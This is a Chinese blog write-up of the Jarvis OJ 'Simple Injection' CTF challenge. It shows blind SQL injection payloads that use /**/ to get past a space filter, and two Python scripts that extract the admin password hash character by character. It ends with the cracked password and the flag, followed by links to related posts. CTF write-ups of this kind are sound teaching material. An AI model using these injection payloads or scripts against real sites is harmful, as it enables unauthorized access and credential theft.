Jarvisoj_Simple Injection

最新推荐文章于 2024-08-10 07:21:49 发布
最新推荐文章于 2024-08-10 07:21:49 发布
阅读量1.5k 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: Jarvisoj 文章标签: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_33426111/article/details/79439739
本文详细介绍了 Jarvisoj 上的一个简单注入问题,通过分析登录页面的响应和尝试不同注入测试,确认存在 SQL 注入漏洞。经过盲注方法,找到了数据库中的 admin 表,以及表内的 username 和 password 字段,并通过错误盲注确定了密码长度为 32 位,推测使用了 MD5 加密。最后使用 Python 进行爆破,得到了密码的 MD5 值,并解密得到 flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Simple Injection
- 167 SOLVERS
- 350 WEB
很简单的注入,大家试试?
题目入口:http://web.jarvisoj.com:32787/
题目来源:ISCC2016
访问页面之后,得到就是一个登陆页面。通过burp进行抓包,发现在响应头或者是页面中含有提示信息,那么就说明这的确是一个普通的登陆型的SQL注入漏洞了。

常见的登陆漏洞类型
同时验证用户名和密码

$sql = select * from users where username=$username and password=$password
$result = mysql_query($sql);
if($result) {
    echo "登陆成功";
} else {
    echo "登陆失败";
}

分步验证用户名、密码

$sql = "select password from users where username='$username'"
$result = mysql_query($sql);
if($result) {
    $row = mysql_fetch_row($result);
    $query_password = $row[$password];
    #对输入的$password进行变形
    $input_password = modify($passowrd);
    if($input_password == $query_password) {
        echo "登陆成功";
    } else {
        echo "密码错误";
    }

} else {
    echo "用户不存在";
}

本题
尝试使用username=admin&password=123456,页面返回密码错误
尝试使用username=user&password=123456,页面返回用户名错误
那么就说明验证方式是采用的用户名和密码分步验证的。

想法验证
使用username=admin’#&password=123456,页面返回密码错误,说明后台没有对#和’进行过滤。
使用username=admin’ or 1=1#&password=123456,页面返回用户名错误,上面后台对admin’ or 1=1#中的部分内容进行了过滤。过滤的内容有可能是or也有可能是空格。
使用username=user’//or//1=1#&password=123456,页面返回密码错误,说明输入的SQL语句能够被执行,这也表明后台仅仅是过滤了空格。
总结,username存在sql注入,同时仅仅只是过滤了空格,那么就是一个盲注了
PoC
整个PoC就是一个基于错误的盲注的步骤了,具体的方法可以参考文章。

查找表,username=user’//or//exists(select////from/*/admin)#&password=123456,页面返回密码错误,那么就说明在数据库中存在admin表
查找字段username=user’//or//exists(select//username,password//from/**/admin)#&password=123456,页面返回密码错误,说明在admin表中存在username和password字段。
username=user’//or//exists(select//count()//from/*/admin)#&password=123456,页面返回密码错误,说明在admin表中仅仅只存在一条记录,接下来就好办了
得到password长度,username=user’//or//(select//length(password)//from/**/admin)>10#&password=123456,通过二分试探法,最终发现password的字段长度是32位,说明可能采用的是md5的方式来进行加密的。
在确定了password的长度之后,接下来就是利用Python来进行爆破了。

网上找的参考代码
一、

import requests

def get_data():
    result = ""
    url = 'http://web.jarvisoj.com:32787/login.php'
    payload = {
        "username":'xx',
        "password":1,
    }
    username_template = "'/**/or/**/ascii(substr((select/**/password/**/from/**/admin),{0},1))>{1}#"
    chars = '0123456789@ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz'
    for i  in range(1,33):
        for char in chars:
            char_ascii = ord(char)
            username = username_template.format(i,char_ascii)
            payload['username'] = username
            response = requests.post(url,data=payload)
            length = len(response.text)
            # print(length)
            #返回的长度只有1191和1192
            if length>1191:
                print(char)
                result += char
                break
    print(result)

get_data()

二、

#encoding: utf-8
 #created by noble @ 2017.1.21
import requests
url = "http://web.jarvisoj.com:32787/login.php"
table_name_temp = "admin'/**/and/**/ascii(substr((select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema=database()/**/limit/**/0,1),{0},1))>{1}#"
column_name_temp = "admin'/**/and/**/ascii(substr((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name=0x61646D696E/**/limit/**/2,1),{0},1))>{1}#"
password_temp = "admin'/**/and/**/ascii(substr((select/**/password/**/from/**/admin/**/limit/**/0,1),{0},1))>{1}#"
result = ""
session = requests.Session()
char = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
for i in range(1, 50):      #设置字符长度为50
       for c in char:
              asc = ord(c)      #获取字符的ascii值
              username = password_temp.format(i, asc)
              data = {'username': username,
              'password': 'admin'
              }
              req = session.post(url=url, data=data, timeout=10)
              status = req.status_code
              length = req.headers['content-length']
              if status == 200:
                     #print length
                     #print req.text
                     if length == "1205":
                            result += c
                            print c
                            break
print result

最后得到password的值为334cfb59c9d74849801d5acdcfdaadc3。
解md5后得:eTAloCrEP
登陆后得到flag:flag:CTF{s1mpl3_1nJ3ction_very_easy!!}

UG\NX二次开发 创建简单孔特征 UF_MODL_create_simple_hole
王牌飞行员_里海的博客
04-27 1833
创建简单孔特征 UF_MODL_create_simple_hole。
UEFI 键盘数据的读取(基于EFI_SIMPLE_TEXT_INPUT_PROTOCOL)
qq_30135687的博客
09-08 2356
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、EFI_SIMPLE_TEXT_INPUT_PROTOCOL二、EFI_SIMPLE_TEXT_INPUT_PROTOCOL.Reset()三、EFI_SIMPLE_TEXT_INPUT_PROTOCOL.ReadKeyStroke()四、EFI_SIMPLE_TEXT_INPUT_PROTOCOL.WaitForKey()五、EFI_SIMPLE_TEXT_INPUT_PROTOCOL的定义六、EFI_SIMPLE_TEX
PHPINFO(jarvisoj)
Mikasa
04-19 911
今天做题的时候做了这一道。。刷新了对反序列化的认识。。 这道题考察了关于session序列化选择器的漏洞。。 参考文章:https://www.jb51.net/article/107101.htm 首先先介绍一下,关于session反序列化的三种机制: 首先在php.ini中关于session的设置: session.save_path="" #设置session的储存路径 sess...
Jarvis OJ Simple Injection
沐目的博客
05-10 592
Jarvis OJ Simple Injection 题目提示说是sql注入,一打开就是登陆界面,发现输入admin显示的是密码错误,输入其他的是用户名错误,绕后就想到了实验吧的一道题,“” ...
Jarvis-OJ-- Simple Injection解法
qq_42812036的博客
11-05 562
PORT51(curl) LOCALHOST(伪造ip) Login(SQL注入) 神盾局的秘密(base64编码+反序列化) IN A Mess(代码审计+过滤空格SQL注入) admin(robots.txt+cookie欺骗) [61dctf]babyphp(Git泄露+代码注入) Easy Gallery(文件上传、%00截断) Simple Injection(过滤空格SQL注入) RE...
Jarvis OJ /inject
沐目的博客
10-15 321
Jarvis OJ /inject 感觉SQL注入挺重要的,也算是比较基础的东西,而且经常写题会遇到。所以就打算每次遇到一些新的东西,或者忘了的东西,就记录一下。也会记录一些数据库的知识,毕竟SQL注入和数据库是分不开的。 一.MySQL数据排序asc、desc 1.asc 这个就是把查询到的数据,从小到大的排列,当然,这也是默认的排解方式。像这个是没有加任何其他东西的查找。 mysql&gt...
简单注入器(Simple Injector)
gitblog_00074的博客
05-14 412
简单注入器(Simple Injector) 简单注入器 是一个强大的 .NET 应用程序开发的依赖注入(Dependency Injection)库,旨在提供易于使用、灵活且快速的服务,帮助开发者遵循最佳实践,避免陷阱并实现高可维护性应用。 项目介绍 简单注入器以其简单易懂的API和精心挑选的特性集区别于其他容器。它支持装饰器注册和容器验证等功能,适用于大型开发项目。在.NET 4.5 及以上版...
保密码查看器 [ANT]_Simple_v1.8.4
08-11
用于开锁,NOKIA手机的保密码查看! 就是那个手机的该死的密码……设定了以后,过了几个月,换手机了,就忘了...怎么也想不起来…… 于是,我去网上找啊找!终于发现了!绝对可以用! ...手机连接电脑,不要把手机锁了。...
PX4应用实例3:px4_simple_app
xiaoshuai537的博客
04-02 1809
1. 打开src/examples/px4_simple_app/px4_simple_app.c #include #include #include #include #include #include #include #include #include #include #include __EXPORT int px4_simple_app_main(int
opencv笔记二十九(轮廓发现)findContours(t2, contour, hierarchy, RETR_TREE, CHAIN_APPROX_SIMPLE, Point(0, 0));
C++养成记
07-14 9979
  API: cv::findContours( //发现轮廓 InputOutputArray  binImg, // 输入图像,非0的像素被看成1,0的像素值保持不变,8-bit  OutputArrayOfArrays  contours,// 全部发现的轮廓对象,                                                        /...
jarvisoj Inject & PHPINFO
river
03-26 558
Jarvisoj Inject 扫描后台得到index.php~ <?php require("config.php"); $table = $_GET['table']?$_GET['table']:"test"; $table = Filter($table); mysqli_query($mysqli,"desc `secret_{$table}`") or Hacker(); $sq...
SimpleInjector 简单使用
weixin_30652491的博客
03-27 519
SimpleInjector 简单使用,未完待续 转载于:https://www.cnblogs.com/aresyl/p/6627372.html
jarvisoj-web-inject
lb821756107的专栏
05-06 287
题目描述: 题目入口:http://web.jarvisoj.com:32794/ Hint1: 先找到源码再说吧~~ 知识点罗列: 1, SQL UNION 操作符合并两个或多个 SELECT 语句的结果。 2,select 执行另一个语句, select(if xxxxxxx) 3,len() 、 length()函数返回文本字段中值的长度。 4,在MySQL中,把 i...
Simple Injector 使用教程
最新发布
gitblog_00821的博客
08-10 307
Simple Injector 使用教程 项目介绍 Simple Injector 是一个开源的依赖注入(Dependency Injection, DI)库,专为 .NET 平台设计。它旨在通过支持最佳实践来引导开发者走向成功,提供简单、灵活且高性能的依赖注入解决方案。Simple Injector 支持多种 .NET 框架,包括 .NET 4.5 及以上版本、.NET Standard、.NE...
SimpleInjector的使用
weixin_30389003的博客
10-05 411
SimpleInjector的使用 国庆大假,但是,小弟依然学习,前天去看了房交会,尼玛,吓屎宝宝了,还是安静的坐在公司里巧代码比较合适; the usage of injector consists of four to six steps; 1.create a new container 2.configure the container(register...
Jarvis OJ inject(反引号注入)
wywwzjj
02-22 923
http://web.jarvisoj.com:32794/index.php~ 得到源码 &amp;amp;amp;amp;amp;lt;?php require(&amp;amp;amp;amp;quot;config.php&amp;amp;amp;amp;quot;); $table = $_GET['table']?$_GET['table']:&amp;amp;amp;amp;quot;test&amp;amp;amp;amp;quot;;
171219 JarvisOJ(DebugMe)(1)
whklhhhh的博客
12-20 504
1625-5 王子昂 总结《2017年12月19日》 【连续第445天总结】 A. JarvisOJ-DebugMe B. JarvisOJ上的题…真是让人痛苦又快乐着,每题都挺难的,但是又能学到不少东西,但是WP难找真让人头疼OTZ强迫自己学习呀这是拖入IDA反编译,发现是Elf的动态链接库 所以动态调试就比较麻烦了(:з」∠)还要自己写个程序加载它main函数很直接,要求有2个参数
[SimpleOJ236]暴风雨
weixin_33896726的博客
10-23 109
题目大意:   给你一棵n个点的树,以及m+q条信息。   m条描述点a到b有边直接相连。   q条描述点a和点b的LCA为c。   问有多少符合条件的以1为根的树。 思路:   状压DP。   e[i]记录需要与点i直接相连的点。   sub[i]记录需要在点i子树中的点。   pair[i]记录在点i不同子树下的点对(x,y),即满足lca(x,y)=i。   f...
以jarvis oj api接口为例讲解xxe攻击
欢迎来到神林的博客
09-10 578
以jarvis oj api接口为例讲解xxe攻击 xml基本介绍 xml被设计来进行数据的传输以及数据储存。xml文档结构包括: 其中xxe就是利用DTD中特意声明某种协议再用文档元素进行调用来实现攻击。 xml内外部元素 由于可以对DTD进行声明,我们有两种选择:内部实体声明: <!DOCTYPE note [<!ELEMENT noet (xxx)>]> 其中...
STATIC_ASSERT_SIMPLE
04-11
STATIC_ASSERT_SIMPLE是一个宏定义,用于在编译时进行静态断言。静态断言是一种在编译时检查条件是否满足的机制,如果条件不满足,则会在编译时产生错误,从而提前发现潜在的问题。 STATIC_ASSERT_SIMPLE的定义如下: ```cpp #define STATIC_ASSERT_SIMPLE(expr) static_assert(expr, #expr) ``` 它接受一个表达式expr作为参数,并使用static_assert宏来进行断言。如果expr的结果为false或0,则会在编译时产生错误,并输出#expr作为错误信息。 使用STATIC_ASSERT_SIMPLE可以在编译时对一些条件进行检查,例如类型大小、常量值等,以确保程序的正确性和安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值